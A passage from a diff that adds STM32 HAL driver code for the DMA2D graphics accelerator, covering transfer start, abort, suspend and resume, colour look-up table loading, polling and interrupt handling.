*/ + WRITE_REG(hdma2d->Instance->BGMAR, SrcAddress2); + + /* Configure the source, destination address and the data size */ + DMA2D_SetConfig(hdma2d, SrcAddress1, DstAddress, Width, Height); + + /* Enable the transfer complete, transfer error and configuration error interrupts */ + __HAL_DMA2D_ENABLE_IT(hdma2d, DMA2D_IT_TC | DMA2D_IT_TE | DMA2D_IT_CE); + + /* Enable the Peripheral */ + __HAL_DMA2D_ENABLE(hdma2d); + + return HAL_OK; +} + +/** + * @brief Abort the DMA2D Transfer. + * @param hdma2d pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_Abort(DMA2D_HandleTypeDef *hdma2d) +{ + uint32_t tickstart; + + /* Abort the DMA2D transfer */ + /* START bit is reset to make sure not to set it again, in the event the HW clears it + between the register read and the register write by the CPU (writing 0 has no + effect on START bitvalue) */ + MODIFY_REG(hdma2d->Instance->CR, DMA2D_CR_ABORT | DMA2D_CR_START, DMA2D_CR_ABORT); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Check if the DMA2D is effectively disabled */ + while ((hdma2d->Instance->CR & DMA2D_CR_START) != 0U) + { + if ((HAL_GetTick() - tickstart) > DMA2D_TIMEOUT_ABORT) + { + /* Update error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_TIMEOUT; + + /* Change the DMA2D state */ + hdma2d->State = HAL_DMA2D_STATE_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma2d); + + return HAL_TIMEOUT; + } + } + + /* Disable the Transfer Complete, Transfer Error and Configuration Error interrupts */ + __HAL_DMA2D_DISABLE_IT(hdma2d, DMA2D_IT_TC | DMA2D_IT_TE | DMA2D_IT_CE); + + /* Change the DMA2D state*/ + hdma2d->State = HAL_DMA2D_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma2d); + + return HAL_OK; +} + +/** + * @brief Suspend the DMA2D Transfer. + * @param hdma2d pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_Suspend(DMA2D_HandleTypeDef *hdma2d) +{ + uint32_t tickstart; + + /* Suspend the DMA2D transfer */ + /* START bit is reset to make sure not to set it again, in the event the HW clears it + between the register read and the register write by the CPU (writing 0 has no + effect on START bitvalue). */ + MODIFY_REG(hdma2d->Instance->CR, DMA2D_CR_SUSP | DMA2D_CR_START, DMA2D_CR_SUSP); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Check if the DMA2D is effectively suspended */ + while ((hdma2d->Instance->CR & (DMA2D_CR_SUSP | DMA2D_CR_START)) == DMA2D_CR_START) + { + if ((HAL_GetTick() - tickstart) > DMA2D_TIMEOUT_SUSPEND) + { + /* Update error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_TIMEOUT; + + /* Change the DMA2D state */ + hdma2d->State = HAL_DMA2D_STATE_TIMEOUT; + + return HAL_TIMEOUT; + } + } + + /* Check whether or not a transfer is actually suspended and change the DMA2D state accordingly */ + if ((hdma2d->Instance->CR & DMA2D_CR_START) != 0U) + { + hdma2d->State = HAL_DMA2D_STATE_SUSPEND; + } + else + { + /* Make sure SUSP bit is cleared since it is meaningless + when no transfer is on-going */ + CLEAR_BIT(hdma2d->Instance->CR, DMA2D_CR_SUSP); + } + + return HAL_OK; +} + +/** + * @brief Resume the DMA2D Transfer. + * @param hdma2d pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_Resume(DMA2D_HandleTypeDef *hdma2d) +{ + /* Check the SUSP and START bits */ + if ((hdma2d->Instance->CR & (DMA2D_CR_SUSP | DMA2D_CR_START)) == (DMA2D_CR_SUSP | DMA2D_CR_START)) + { + /* Ongoing transfer is suspended: change the DMA2D state before resuming */ + hdma2d->State = HAL_DMA2D_STATE_BUSY; + } + + /* Resume the DMA2D transfer */ + /* START bit is reset to make sure not to set it again, in the event the HW clears it + between the register read and the register write by the CPU (writing 0 has no + effect on START bitvalue). */ + CLEAR_BIT(hdma2d->Instance->CR, (DMA2D_CR_SUSP | DMA2D_CR_START)); + + return HAL_OK; +} + + +/** + * @brief Enable the DMA2D CLUT Transfer. + * @param hdma2d Pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @param LayerIdx DMA2D Layer index. + * This parameter can be one of the following values: + * DMA2D_BACKGROUND_LAYER(0) / DMA2D_FOREGROUND_LAYER(1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_EnableCLUT(DMA2D_HandleTypeDef *hdma2d, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_DMA2D_LAYER(LayerIdx)); + + /* Process locked */ + __HAL_LOCK(hdma2d); + + /* Change DMA2D peripheral state */ + hdma2d->State = HAL_DMA2D_STATE_BUSY; + + if (LayerIdx == DMA2D_BACKGROUND_LAYER) + { + /* Enable the background CLUT loading */ + SET_BIT(hdma2d->Instance->BGPFCCR, DMA2D_BGPFCCR_START); + } + else + { + /* Enable the foreground CLUT loading */ + SET_BIT(hdma2d->Instance->FGPFCCR, DMA2D_FGPFCCR_START); + } + + return HAL_OK; +} + +/** + * @brief Start DMA2D CLUT Loading. + * @param hdma2d Pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @param CLUTCfg Pointer to a DMA2D_CLUTCfgTypeDef structure that contains + * the configuration information for the color look up table. + * @param LayerIdx DMA2D Layer index. + * This parameter can be one of the following values: + * DMA2D_BACKGROUND_LAYER(0) / DMA2D_FOREGROUND_LAYER(1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_CLUTStartLoad(DMA2D_HandleTypeDef *hdma2d, DMA2D_CLUTCfgTypeDef *CLUTCfg, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_DMA2D_LAYER(LayerIdx)); + assert_param(IS_DMA2D_CLUT_CM(CLUTCfg->CLUTColorMode)); + assert_param(IS_DMA2D_CLUT_SIZE(CLUTCfg->Size)); + + /* Process locked */ + __HAL_LOCK(hdma2d); + + /* Change DMA2D peripheral state */ + hdma2d->State = HAL_DMA2D_STATE_BUSY; + + /* Configure the CLUT of the background DMA2D layer */ + if (LayerIdx == DMA2D_BACKGROUND_LAYER) + { + /* Write background CLUT memory address */ + WRITE_REG(hdma2d->Instance->BGCMAR, (uint32_t)CLUTCfg->pCLUT); + + /* Write background CLUT size and CLUT color mode */ + MODIFY_REG(hdma2d->Instance->BGPFCCR, (DMA2D_BGPFCCR_CS | DMA2D_BGPFCCR_CCM), + ((CLUTCfg->Size << DMA2D_BGPFCCR_CS_Pos) | (CLUTCfg->CLUTColorMode << DMA2D_BGPFCCR_CCM_Pos))); + + /* Enable the CLUT loading for the background */ + SET_BIT(hdma2d->Instance->BGPFCCR, DMA2D_BGPFCCR_START); + } + /* Configure the CLUT of the foreground DMA2D layer */ + else + { + /* Write foreground CLUT memory address */ + WRITE_REG(hdma2d->Instance->FGCMAR, (uint32_t)CLUTCfg->pCLUT); + + /* Write foreground CLUT size and CLUT color mode */ + MODIFY_REG(hdma2d->Instance->FGPFCCR, (DMA2D_FGPFCCR_CS | DMA2D_FGPFCCR_CCM), + ((CLUTCfg->Size << DMA2D_FGPFCCR_CS_Pos) | (CLUTCfg->CLUTColorMode << DMA2D_FGPFCCR_CCM_Pos))); + + /* Enable the CLUT loading for the foreground */ + SET_BIT(hdma2d->Instance->FGPFCCR, DMA2D_FGPFCCR_START); + } + + return HAL_OK; +} + +/** + * @brief Start DMA2D CLUT Loading with interrupt enabled. + * @param hdma2d Pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @param CLUTCfg Pointer to a DMA2D_CLUTCfgTypeDef structure that contains + * the configuration information for the color look up table. + * @param LayerIdx DMA2D Layer index. + * This parameter can be one of the following values: + * DMA2D_BACKGROUND_LAYER(0) / DMA2D_FOREGROUND_LAYER(1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_CLUTStartLoad_IT(DMA2D_HandleTypeDef *hdma2d, DMA2D_CLUTCfgTypeDef *CLUTCfg, + uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_DMA2D_LAYER(LayerIdx)); + assert_param(IS_DMA2D_CLUT_CM(CLUTCfg->CLUTColorMode)); + assert_param(IS_DMA2D_CLUT_SIZE(CLUTCfg->Size)); + + /* Process locked */ + __HAL_LOCK(hdma2d); + + /* Change DMA2D peripheral state */ + hdma2d->State = HAL_DMA2D_STATE_BUSY; + + /* Configure the CLUT of the background DMA2D layer */ + if (LayerIdx == DMA2D_BACKGROUND_LAYER) + { + /* Write background CLUT memory address */ + WRITE_REG(hdma2d->Instance->BGCMAR, (uint32_t)CLUTCfg->pCLUT); + + /* Write background CLUT size and CLUT color mode */ + MODIFY_REG(hdma2d->Instance->BGPFCCR, (DMA2D_BGPFCCR_CS | DMA2D_BGPFCCR_CCM), + ((CLUTCfg->Size << DMA2D_BGPFCCR_CS_Pos) | (CLUTCfg->CLUTColorMode << DMA2D_BGPFCCR_CCM_Pos))); + + /* Enable the CLUT Transfer Complete, transfer Error, configuration Error and CLUT Access Error interrupts */ + __HAL_DMA2D_ENABLE_IT(hdma2d, DMA2D_IT_CTC | DMA2D_IT_TE | DMA2D_IT_CE | DMA2D_IT_CAE); + + /* Enable the CLUT loading for the background */ + SET_BIT(hdma2d->Instance->BGPFCCR, DMA2D_BGPFCCR_START); + } + /* Configure the CLUT of the foreground DMA2D layer */ + else + { + /* Write foreground CLUT memory address */ + WRITE_REG(hdma2d->Instance->FGCMAR, (uint32_t)CLUTCfg->pCLUT); + + /* Write foreground CLUT size and CLUT color mode */ + MODIFY_REG(hdma2d->Instance->FGPFCCR, (DMA2D_FGPFCCR_CS | DMA2D_FGPFCCR_CCM), + ((CLUTCfg->Size << DMA2D_FGPFCCR_CS_Pos) | (CLUTCfg->CLUTColorMode << DMA2D_FGPFCCR_CCM_Pos))); + + /* Enable the CLUT Transfer Complete, transfer Error, configuration Error and CLUT Access Error interrupts */ + __HAL_DMA2D_ENABLE_IT(hdma2d, DMA2D_IT_CTC | DMA2D_IT_TE | DMA2D_IT_CE | DMA2D_IT_CAE); + + /* Enable the CLUT loading for the foreground */ + SET_BIT(hdma2d->Instance->FGPFCCR, DMA2D_FGPFCCR_START); + } + + return HAL_OK; +} + +/** + * @brief Start DMA2D CLUT Loading. + * @param hdma2d Pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @param CLUTCfg Pointer to a DMA2D_CLUTCfgTypeDef structure that contains + * the configuration information for the color look up table. + * @param LayerIdx DMA2D Layer index. + * This parameter can be one of the following values: + * DMA2D_BACKGROUND_LAYER(0) / DMA2D_FOREGROUND_LAYER(1) + * @note API obsolete and maintained for compatibility with legacy. User is + * invited to resort to HAL_DMA2D_CLUTStartLoad() instead to benefit from + * code compactness, code size and improved heap usage. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_CLUTLoad(DMA2D_HandleTypeDef *hdma2d, DMA2D_CLUTCfgTypeDef CLUTCfg, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_DMA2D_LAYER(LayerIdx)); + assert_param(IS_DMA2D_CLUT_CM(CLUTCfg.CLUTColorMode)); + assert_param(IS_DMA2D_CLUT_SIZE(CLUTCfg.Size)); + + /* Process locked */ + __HAL_LOCK(hdma2d); + + /* Change DMA2D peripheral state */ + hdma2d->State = HAL_DMA2D_STATE_BUSY; + + /* Configure the CLUT of the background DMA2D layer */ + if (LayerIdx == DMA2D_BACKGROUND_LAYER) + { + /* Write background CLUT memory address */ + WRITE_REG(hdma2d->Instance->BGCMAR, (uint32_t)CLUTCfg.pCLUT); + + /* Write background CLUT size and CLUT color mode */ + MODIFY_REG(hdma2d->Instance->BGPFCCR, (DMA2D_BGPFCCR_CS | DMA2D_BGPFCCR_CCM), + ((CLUTCfg.Size << DMA2D_BGPFCCR_CS_Pos) | (CLUTCfg.CLUTColorMode << DMA2D_BGPFCCR_CCM_Pos))); + + /* Enable the CLUT loading for the background */ + SET_BIT(hdma2d->Instance->BGPFCCR, DMA2D_BGPFCCR_START); + } + /* Configure the CLUT of the foreground DMA2D layer */ + else + { + /* Write foreground CLUT memory address */ + WRITE_REG(hdma2d->Instance->FGCMAR, (uint32_t)CLUTCfg.pCLUT); + + /* Write foreground CLUT size and CLUT color mode */ + MODIFY_REG(hdma2d->Instance->FGPFCCR, (DMA2D_FGPFCCR_CS | DMA2D_FGPFCCR_CCM), + ((CLUTCfg.Size << DMA2D_FGPFCCR_CS_Pos) | (CLUTCfg.CLUTColorMode << DMA2D_FGPFCCR_CCM_Pos))); + + /* Enable the CLUT loading for the foreground */ + SET_BIT(hdma2d->Instance->FGPFCCR, DMA2D_FGPFCCR_START); + } + + return HAL_OK; +} + +/** + * @brief Start DMA2D CLUT Loading with interrupt enabled. + * @param hdma2d Pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @param CLUTCfg Pointer to a DMA2D_CLUTCfgTypeDef structure that contains + * the configuration information for the color look up table. + * @param LayerIdx DMA2D Layer index. + * This parameter can be one of the following values: + * DMA2D_BACKGROUND_LAYER(0) / DMA2D_FOREGROUND_LAYER(1) + * @note API obsolete and maintained for compatibility with legacy. User is + * invited to resort to HAL_DMA2D_CLUTStartLoad_IT() instead to benefit + * from code compactness, code size and improved heap usage. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_CLUTLoad_IT(DMA2D_HandleTypeDef *hdma2d, DMA2D_CLUTCfgTypeDef CLUTCfg, uint32_t LayerIdx) +{ + /* Check the parameters */ + assert_param(IS_DMA2D_LAYER(LayerIdx)); + assert_param(IS_DMA2D_CLUT_CM(CLUTCfg.CLUTColorMode)); + assert_param(IS_DMA2D_CLUT_SIZE(CLUTCfg.Size)); + + /* Process locked */ + __HAL_LOCK(hdma2d); + + /* Change DMA2D peripheral state */ + hdma2d->State = HAL_DMA2D_STATE_BUSY; + + /* Configure the CLUT of the background DMA2D layer */ + if (LayerIdx == DMA2D_BACKGROUND_LAYER) + { + /* Write background CLUT memory address */ + WRITE_REG(hdma2d->Instance->BGCMAR, (uint32_t)CLUTCfg.pCLUT); + + /* Write background CLUT size and CLUT color mode */ + MODIFY_REG(hdma2d->Instance->BGPFCCR, (DMA2D_BGPFCCR_CS | DMA2D_BGPFCCR_CCM), + ((CLUTCfg.Size << DMA2D_BGPFCCR_CS_Pos) | (CLUTCfg.CLUTColorMode << DMA2D_BGPFCCR_CCM_Pos))); + + /* Enable the CLUT Transfer Complete, transfer Error, configuration Error and CLUT Access Error interrupts */ + __HAL_DMA2D_ENABLE_IT(hdma2d, DMA2D_IT_CTC | DMA2D_IT_TE | DMA2D_IT_CE | DMA2D_IT_CAE); + + /* Enable the CLUT loading for the background */ + SET_BIT(hdma2d->Instance->BGPFCCR, DMA2D_BGPFCCR_START); + } + /* Configure the CLUT of the foreground DMA2D layer */ + else + { + /* Write foreground CLUT memory address */ + WRITE_REG(hdma2d->Instance->FGCMAR, (uint32_t)CLUTCfg.pCLUT); + + /* Write foreground CLUT size and CLUT color mode */ + MODIFY_REG(hdma2d->Instance->FGPFCCR, (DMA2D_FGPFCCR_CS | DMA2D_FGPFCCR_CCM), + ((CLUTCfg.Size << DMA2D_FGPFCCR_CS_Pos) | (CLUTCfg.CLUTColorMode << DMA2D_FGPFCCR_CCM_Pos))); + + /* Enable the CLUT Transfer Complete, transfer Error, configuration Error and CLUT Access Error interrupts */ + __HAL_DMA2D_ENABLE_IT(hdma2d, DMA2D_IT_CTC | DMA2D_IT_TE | DMA2D_IT_CE | DMA2D_IT_CAE); + + /* Enable the CLUT loading for the foreground */ + SET_BIT(hdma2d->Instance->FGPFCCR, DMA2D_FGPFCCR_START); + } + + return HAL_OK; +} + +/** + * @brief Abort the DMA2D CLUT loading. + * @param hdma2d Pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @param LayerIdx DMA2D Layer index. + * This parameter can be one of the following values: + * DMA2D_BACKGROUND_LAYER(0) / DMA2D_FOREGROUND_LAYER(1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_CLUTLoading_Abort(DMA2D_HandleTypeDef *hdma2d, uint32_t LayerIdx) +{ + uint32_t tickstart; + const __IO uint32_t *reg = &(hdma2d->Instance->BGPFCCR); /* by default, point at background register */ + + /* Abort the CLUT loading */ + SET_BIT(hdma2d->Instance->CR, DMA2D_CR_ABORT); + + /* If foreground CLUT loading is considered, update local variables */ + if (LayerIdx == DMA2D_FOREGROUND_LAYER) + { + reg = &(hdma2d->Instance->FGPFCCR); + } + + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Check if the CLUT loading is aborted */ + while ((*reg & DMA2D_BGPFCCR_START) != 0U) + { + if ((HAL_GetTick() - tickstart) > DMA2D_TIMEOUT_ABORT) + { + /* Update error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_TIMEOUT; + + /* Change the DMA2D state */ + hdma2d->State = HAL_DMA2D_STATE_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma2d); + + return HAL_TIMEOUT; + } + } + + /* Disable the CLUT Transfer Complete, Transfer Error, Configuration Error and CLUT Access Error interrupts */ + __HAL_DMA2D_DISABLE_IT(hdma2d, DMA2D_IT_CTC | DMA2D_IT_TE | DMA2D_IT_CE | DMA2D_IT_CAE); + + /* Change the DMA2D state*/ + hdma2d->State = HAL_DMA2D_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma2d); + + return HAL_OK; +} + +/** + * @brief Suspend the DMA2D CLUT loading. + * @param hdma2d Pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @param LayerIdx DMA2D Layer index. + * This parameter can be one of the following values: + * DMA2D_BACKGROUND_LAYER(0) / DMA2D_FOREGROUND_LAYER(1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_CLUTLoading_Suspend(DMA2D_HandleTypeDef *hdma2d, uint32_t LayerIdx) +{ + uint32_t tickstart; + uint32_t loadsuspended; + const __IO uint32_t *reg = &(hdma2d->Instance->BGPFCCR); /* by default, point at background register */ + + /* Suspend the CLUT loading */ + SET_BIT(hdma2d->Instance->CR, DMA2D_CR_SUSP); + + /* If foreground CLUT loading is considered, update local variables */ + if (LayerIdx == DMA2D_FOREGROUND_LAYER) + { + reg = &(hdma2d->Instance->FGPFCCR); + } + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Check if the CLUT loading is suspended */ + /* 1st condition: Suspend Check */ + loadsuspended = ((hdma2d->Instance->CR & DMA2D_CR_SUSP) == DMA2D_CR_SUSP) ? 1UL : 0UL; + /* 2nd condition: Not Start Check */ + loadsuspended |= ((*reg & DMA2D_BGPFCCR_START) != DMA2D_BGPFCCR_START) ? 1UL : 0UL; + while (loadsuspended == 0UL) + { + if ((HAL_GetTick() - tickstart) > DMA2D_TIMEOUT_SUSPEND) + { + /* Update error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_TIMEOUT; + + /* Change the DMA2D state */ + hdma2d->State = HAL_DMA2D_STATE_TIMEOUT; + + return HAL_TIMEOUT; + } + /* 1st condition: Suspend Check */ + loadsuspended = ((hdma2d->Instance->CR & DMA2D_CR_SUSP) == DMA2D_CR_SUSP) ? 1UL : 0UL; + /* 2nd condition: Not Start Check */ + loadsuspended |= ((*reg & DMA2D_BGPFCCR_START) != DMA2D_BGPFCCR_START) ? 1UL : 0UL; + } + + /* Check whether or not a transfer is actually suspended and change the DMA2D state accordingly */ + if ((*reg & DMA2D_BGPFCCR_START) != 0U) + { + hdma2d->State = HAL_DMA2D_STATE_SUSPEND; + } + else + { + /* Make sure SUSP bit is cleared since it is meaningless + when no transfer is on-going */ + CLEAR_BIT(hdma2d->Instance->CR, DMA2D_CR_SUSP); + } + + return HAL_OK; +} + +/** + * @brief Resume the DMA2D CLUT loading. + * @param hdma2d pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @param LayerIdx DMA2D Layer index. + * This parameter can be one of the following values: + * DMA2D_BACKGROUND_LAYER(0) / DMA2D_FOREGROUND_LAYER(1) + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_CLUTLoading_Resume(DMA2D_HandleTypeDef *hdma2d, uint32_t LayerIdx) +{ + /* Check the SUSP and START bits for background or foreground CLUT loading */ + if (LayerIdx == DMA2D_BACKGROUND_LAYER) + { + /* Background CLUT loading suspension check */ + if ((hdma2d->Instance->CR & DMA2D_CR_SUSP) == DMA2D_CR_SUSP) + { + if ((hdma2d->Instance->BGPFCCR & DMA2D_BGPFCCR_START) == DMA2D_BGPFCCR_START) + { + /* Ongoing CLUT loading is suspended: change the DMA2D state before resuming */ + hdma2d->State = HAL_DMA2D_STATE_BUSY; + } + } + } + else + { + /* Foreground CLUT loading suspension check */ + if ((hdma2d->Instance->CR & DMA2D_CR_SUSP) == DMA2D_CR_SUSP) + { + if ((hdma2d->Instance->FGPFCCR & DMA2D_FGPFCCR_START) == DMA2D_FGPFCCR_START) + { + /* Ongoing CLUT loading is suspended: change the DMA2D state before resuming */ + hdma2d->State = HAL_DMA2D_STATE_BUSY; + } + } + } + + /* Resume the CLUT loading */ + CLEAR_BIT(hdma2d->Instance->CR, DMA2D_CR_SUSP); + + return HAL_OK; +} + + +/** + + * @brief Polling for transfer complete or CLUT loading. + * @param hdma2d Pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DMA2D_PollForTransfer(DMA2D_HandleTypeDef *hdma2d, uint32_t Timeout) +{ + uint32_t tickstart; + uint32_t layer_start; + __IO uint32_t isrflags = 0x0U; + + /* Polling for DMA2D transfer */ + if ((hdma2d->Instance->CR & DMA2D_CR_START) != 0U) + { + /* Get tick */ + tickstart = HAL_GetTick(); + + while (__HAL_DMA2D_GET_FLAG(hdma2d, DMA2D_FLAG_TC) == 0U) + { + isrflags = READ_REG(hdma2d->Instance->ISR); + if ((isrflags & (DMA2D_FLAG_CE | DMA2D_FLAG_TE)) != 0U) + { + if ((isrflags & DMA2D_FLAG_CE) != 0U) + { + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_CE; + } + if ((isrflags & DMA2D_FLAG_TE) != 0U) + { + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_TE; + } + /* Clear the transfer and configuration error flags */ + __HAL_DMA2D_CLEAR_FLAG(hdma2d, DMA2D_FLAG_CE | DMA2D_FLAG_TE); + + /* Change DMA2D state */ + hdma2d->State = HAL_DMA2D_STATE_ERROR; + + /* Process unlocked */ + __HAL_UNLOCK(hdma2d); + + return HAL_ERROR; + } + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + /* Update error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_TIMEOUT; + + /* Change the DMA2D state */ + hdma2d->State = HAL_DMA2D_STATE_TIMEOUT; + + /* Process unlocked */ + __HAL_UNLOCK(hdma2d); + + return HAL_TIMEOUT; + } + } + } + } + /* Polling for CLUT loading (foreground or background) */ + layer_start = hdma2d->Instance->FGPFCCR & DMA2D_FGPFCCR_START; + layer_start |= hdma2d->Instance->BGPFCCR & DMA2D_BGPFCCR_START; + if (layer_start != 0U) + { + /* Get tick */ + tickstart = HAL_GetTick(); + + while (__HAL_DMA2D_GET_FLAG(hdma2d, DMA2D_FLAG_CTC) == 0U) + { + isrflags = READ_REG(hdma2d->Instance->ISR); + if ((isrflags & (DMA2D_FLAG_CAE | DMA2D_FLAG_CE | DMA2D_FLAG_TE)) != 0U) + { + if ((isrflags & DMA2D_FLAG_CAE) != 0U) + { + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_CAE; + } + if ((isrflags & DMA2D_FLAG_CE) != 0U) + { + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_CE; + } + if ((isrflags & DMA2D_FLAG_TE) != 0U) + { + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_TE; + } + /* Clear the CLUT Access Error, Configuration Error and Transfer Error flags */ + __HAL_DMA2D_CLEAR_FLAG(hdma2d, DMA2D_FLAG_CAE | DMA2D_FLAG_CE | DMA2D_FLAG_TE); + + /* Change DMA2D state */ + hdma2d->State = HAL_DMA2D_STATE_ERROR; + + /* Process unlocked */ + __HAL_UNLOCK(hdma2d); + + return HAL_ERROR; + } + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + /* Update error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_TIMEOUT; + + /* Change the DMA2D state */ + hdma2d->State = HAL_DMA2D_STATE_TIMEOUT; + + /* Process unlocked */ + __HAL_UNLOCK(hdma2d); + + return HAL_TIMEOUT; + } + } + } + } + + /* Clear the transfer complete and CLUT loading flags */ + __HAL_DMA2D_CLEAR_FLAG(hdma2d, DMA2D_FLAG_TC | DMA2D_FLAG_CTC); + + /* Change DMA2D state */ + hdma2d->State = HAL_DMA2D_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hdma2d); + + return HAL_OK; +} +/** + * @brief Handle DMA2D interrupt request. + * @param hdma2d Pointer to a DMA2D_HandleTypeDef structure that contains + * the configuration information for the DMA2D. + * @retval HAL status + */ +void HAL_DMA2D_IRQHandler(DMA2D_HandleTypeDef *hdma2d) +{ + uint32_t isrflags = READ_REG(hdma2d->Instance->ISR); + uint32_t crflags = READ_REG(hdma2d->Instance->CR); + + /* Transfer Error Interrupt management ***************************************/ + if ((isrflags & DMA2D_FLAG_TE) != 0U) + { + if ((crflags & DMA2D_IT_TE) != 0U) + { + /* Disable the transfer Error interrupt */ + __HAL_DMA2D_DISABLE_IT(hdma2d, DMA2D_IT_TE); + + /* Update error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_TE; + + /* Clear the transfer error flag */ + __HAL_DMA2D_CLEAR_FLAG(hdma2d, DMA2D_FLAG_TE); + + /* Change DMA2D state */ + hdma2d->State = HAL_DMA2D_STATE_ERROR; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma2d); + + if (hdma2d->XferErrorCallback != NULL) + { + /* Transfer error Callback */ + hdma2d->XferErrorCallback(hdma2d); + } + } + } + /* Configuration Error Interrupt management **********************************/ + if ((isrflags & DMA2D_FLAG_CE) != 0U) + { + if ((crflags & DMA2D_IT_CE) != 0U) + { + /* Disable the Configuration Error interrupt */ + __HAL_DMA2D_DISABLE_IT(hdma2d, DMA2D_IT_CE); + + /* Clear the Configuration error flag */ + __HAL_DMA2D_CLEAR_FLAG(hdma2d, DMA2D_FLAG_CE); + + /* Update error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_CE; + + /* Change DMA2D state */ + hdma2d->State = HAL_DMA2D_STATE_ERROR; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma2d); + + if (hdma2d->XferErrorCallback != NULL) + { + /* Transfer error Callback */ + hdma2d->XferErrorCallback(hdma2d); + } + } + } + /* CLUT access Error Interrupt management ***********************************/ + if ((isrflags & DMA2D_FLAG_CAE) != 0U) + { + if ((crflags & DMA2D_IT_CAE) != 0U) + { + /* Disable the CLUT access error interrupt */ + __HAL_DMA2D_DISABLE_IT(hdma2d, DMA2D_IT_CAE); + + /* Clear the CLUT access error flag */ + __HAL_DMA2D_CLEAR_FLAG(hdma2d, DMA2D_FLAG_CAE); + + /* Update error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_CAE; + + /* Change DMA2D state */ + hdma2d->State = HAL_DMA2D_STATE_ERROR; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma2d); + + if (hdma2d->XferErrorCallback != NULL) + { + /* Transfer error Callback */ + hdma2d->XferErrorCallback(hdma2d); + } + } + } + /* Transfer watermark Interrupt management **********************************/ + if ((isrflags & DMA2D_FLAG_TW) != 0U) + { + if ((crflags & DMA2D_IT_TW) != 0U) + { + /* Disable the transfer watermark interrupt */ + __HAL_DMA2D_DISABLE_IT(hdma2d, DMA2D_IT_TW); + + /* Clear the transfer watermark flag */ + __HAL_DMA2D_CLEAR_FLAG(hdma2d, DMA2D_FLAG_TW); + + /* Transfer watermark Callback */ +#if (USE_HAL_DMA2D_REGISTER_CALLBACKS == 1) + hdma2d->LineEventCallback(hdma2d); +#else + HAL_DMA2D_LineEventCallback(hdma2d); +#endif /* USE_HAL_DMA2D_REGISTER_CALLBACKS */ + + } + } + /* Transfer Complete Interrupt management ************************************/ + if ((isrflags & DMA2D_FLAG_TC) != 0U) + { + if ((crflags & DMA2D_IT_TC) != 0U) + { + /* Disable the transfer complete interrupt */ + __HAL_DMA2D_DISABLE_IT(hdma2d, DMA2D_IT_TC); + + /* Clear the transfer complete flag */ + __HAL_DMA2D_CLEAR_FLAG(hdma2d, DMA2D_FLAG_TC); + + /* Update error code */ + hdma2d->ErrorCode |= HAL_DMA2D_ERROR_NONE; + + /* Change DMA2D state */ + hdma2d->State = HAL_DMA2D_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hdma2d); + + if (hdma2d->XferCpltCallback != NULL) + { + /* Transfer complete Callback */ + hdma2d->XferCpltCallback(hdma2d); + } + } + } + /* CLUT Transfer Complete Interrupt management ******************************/ + if ((isrflags & DMA2D_FLAG_CTC) != 0U) + { + if ((crflags & DMA2D_IT_CTC) != 0U) + { + /* Disable the CLUT transfer complete 